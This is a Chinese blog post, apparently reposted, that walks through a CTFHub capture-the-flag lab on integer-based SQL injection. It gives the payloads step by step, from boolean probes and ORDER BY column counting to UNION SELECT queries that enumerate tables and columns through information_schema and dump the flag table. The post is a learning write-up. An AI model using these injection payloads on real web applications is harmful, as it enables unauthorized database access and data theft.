当前位置:首页 » 《休闲阅读》 » 正文

CTFHUB_web_sql整数型注入_JYSNkai的博客

2 人参与  2022年01月02日 16:15  分类 : 《休闲阅读》  评论

点击全文阅读


 

手动解题步骤

1. 检查是否存在注入

and 1=1 #返回正确  
and 1=2 #返回错误

 

 存在

2. 猜字段数 得出字段数

1 order by 1
1 order by 2
1 order by 3

 

可以看出存在俩个字段

3. 爆数据库名

-1 union select user(),database()

## -1是为了前面部分查询无结果,从而显示后面union的查询结果

 得到数据库名称sqli

4. 爆表名

-1 union select 999,group_concat(table_name)from information_schema.tables where table_schema='sqli'

 得到表名 news,flag

5. 爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

 得到字段名flag

6. 获得flag

-1 union select 1,group_concat(flag) from sqli.flag

 

 


点击全文阅读


本文链接:http://zhangshiyu.com/post/32552.html

字段  返回  数据库  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 顾温言沈佳芮小说(顾温言沈佳芮)(给你的第三封信是遗言)完整章节列表_笔趣阁
  • 繁花似锦不休后续更新(姜霁月封临川)_繁花似锦不休后续更新
  • 全文繁花似锦不休+后续+完结(姜霁月封临川)列表_全文繁花似锦不休+后续+完结
  • 江南旧梦故人迟迟未归结局+番外榜单(苏启洋沈薇薇),江南旧梦故人迟迟未归结局+番外榜单
  • 陆妄林一诱爱:在陆先生心上肆意撩火后续(诱爱:在陆先生心上肆意撩火)全篇在线阅读前传
  • 南语沈聿珩优质全章_南语沈聿珩优质全章
  • 蒙蔽双眼的爱不健康内容精选_陆屿白然徐妍隐藏剧情_小说后续在线阅读_无删减免费完结_
  • 兑现99张承诺券后,我签下离婚协议(杨彦柳妍)全书免费_(杨彦柳妍)兑现99张承诺券后,我签下离婚协议后续(杨彦柳妍)
  • (姜千星白子澄)女尊:让我独享妻主,谢谢姜千星白子澄无删减小说在线无广告高口碑小说
  • 萧闵寒林清季安安/陈林尽染绝爱之城+结局+番外_萧闵寒林清季安安/陈林尽染绝爱之城+结局+番外
  • 江南旧梦故人迟迟未归完本(苏启洋沈薇薇)_江南旧梦故人迟迟未归完本
  • 死对头说,我不爱,他就去死优质全文_谢锦墨高分神作_小说后续在线阅读_无删减免费完结_

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1